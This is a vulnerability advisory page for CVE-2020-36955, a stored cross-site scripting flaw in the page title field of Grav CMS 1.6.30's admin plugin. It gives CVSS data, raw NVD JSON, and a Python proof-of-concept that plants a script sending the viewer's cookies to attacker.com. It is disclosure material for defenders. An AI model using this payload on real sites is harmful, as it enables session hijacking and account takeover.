Security Vulnerability Report
CVE-2020-36955 CVSS 6.4 MEDIUM

CVE-2020-36955

Published: 2026-01-26 18:16:26
Last Modified: 2026-04-15 00:35:42

Description

Grav CMS 1.6.30 with Admin Plugin 1.9.18 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the page title field. Attackers can create a new page with a malicious script in the title, which will be executed when the page is viewed in the admin panel or on the site.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Grav CMS < 1.6.31
Grav Admin Plugin < 1.9.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2020-36955 PoC - Grav CMS Admin Plugin Stored XSS
# Affected Version: Grav CMS <= 1.6.30 with Admin Plugin <= 1.9.18
# This PoC demonstrates the stored XSS vulnerability in page title field
import requests
import json

TARGET_URL = "http://target-grav-site.com"
LOGIN_URL = f"{TARGET_URL}/admin"
PAGE_URL = f"{TARGET_URL}/admin/pages"

# Malicious XSS payload for page title
XSS_PAYLOAD = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'


def login_to_admin(username, password):
    """Authenticate to Grav CMS admin panel"""
    session = requests.Session()
    login_data = {
        'user': username,
        'pass': password
    }
    response = session.post(LOGIN_URL, data=login_data)
    return session if response.status_code == 200 else None


def create_page_with_xss(session):
    """Create a new page with XSS payload in title field"""
    page_data = {
        'title': XSS_PAYLOAD,
        'folder': 'malicious-page',
        'content': 'This page contains XSS in the title',
        'visible': True,
        'routable': True
    }
    headers = {
        'Content-Type': 'application/json',
        'X-Requested-With': 'XMLHttpRequest'
    }
    response = session.post(PAGE_URL, json=page_data, headers=headers)
    return response.status_code == 200


def main():
    # Step 1: Login with low-privilege account
    session = login_to_admin('attacker_user', 'password123')
    if not session:
        print("[-] Authentication failed")
        return
    print("[+] Successfully authenticated")

    # Step 2: Create page with XSS payload in title
    if create_page_with_xss(session):
        print("[+] Malicious page created successfully")
        print("[+] XSS payload stored in page title")
        print("[*] When admin views the page, cookie will be stolen")
    else:
        print("[-] Failed to create malicious page")


if __name__ == "__main__":
    main()

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36955", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:26.137", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Grav CMS 1.6.30 with Admin Plugin 1.9.18 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the page title field. Attackers can create a new page with a malicious script in the title, which will be executed when the page is viewed in the admin panel or on the site."}, {"lang": "es", "value": "Grav CMS 1.6.30 con el Admin Plugin 1.9.18 contiene una vulnerabilidad de cross-site scripting persistente que permite a atacantes autenticados inyectar scripts maliciosos a través del campo de título de la página. Los atacantes pueden crear una nueva página con un script malicioso en el título, el cual se ejecutará cuando la página sea vista en el panel de administración o en el sitio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://getgrav.org/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49264", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/grav-cms-admin-plugin-page-title-persistent-cross-site-scripting", "source": "[email protected]"}]}}